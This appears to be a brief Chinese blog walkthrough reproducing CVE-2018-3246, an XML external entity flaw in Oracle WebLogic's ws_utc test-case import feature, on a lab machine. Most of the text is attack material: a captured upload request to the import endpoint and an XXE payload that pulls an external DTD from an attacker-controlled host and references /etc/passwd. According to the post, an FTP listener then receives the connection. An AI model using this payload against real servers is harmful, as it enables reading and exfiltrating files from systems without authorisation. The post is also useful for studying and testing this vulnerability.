CVE-2018-3246 weblogic xxe

http://192.168.245.130:7001/ws_utc/begin.do

导入测试用例

CVE-2018-3246 weblogic xxe

上传时抓取数据包

POST /ws_utc/resources/ws/config/import?timestamp=1566895391388 HTTP/1.1
Host: 192.168.245.130:7001
Content-Length: 215
Cache-Control: max-age=0
Origin: http://192.168.245.130:7001
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycneAkX3GCCBYEERe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.245.130:7001/ws_utc/begin.do
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=GaLSOkvYi0oIdDavN26y4qxUtyN87KDM1GMIdzVPt80PWTsPw2BU!378752043
Connection: close

------WebKitFormBoundarycneAkX3GCCBYEERe
Content-Disposition: form-data; name="import_file_name"; filename="test111.jsp"
Content-Type: application/octet-stream

test
------WebKitFormBoundarycneAkX3GCCBYEERe--

修改payload

<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://192.168.245.1:1234/ext.dtd"><!ENTITY % bbb SYSTEM "file://etc/passwd">%aaa;%ccc;%ddd;]>

FTP服务会收到连接信息

CVE-2018-3246 weblogic xxe

相关文章:

  • 2022-01-20
  • 2022-12-23
  • 2021-05-24
  • 2021-09-02
  • 2021-12-23
  • 2021-09-23
  • 2021-10-26
猜你喜欢
  • 2022-02-15
  • 2021-11-15
  • 2022-12-23
  • 2021-11-04
  • 2021-05-26
  • 2021-12-22
  • 2021-12-17
相关资源
相似解决方案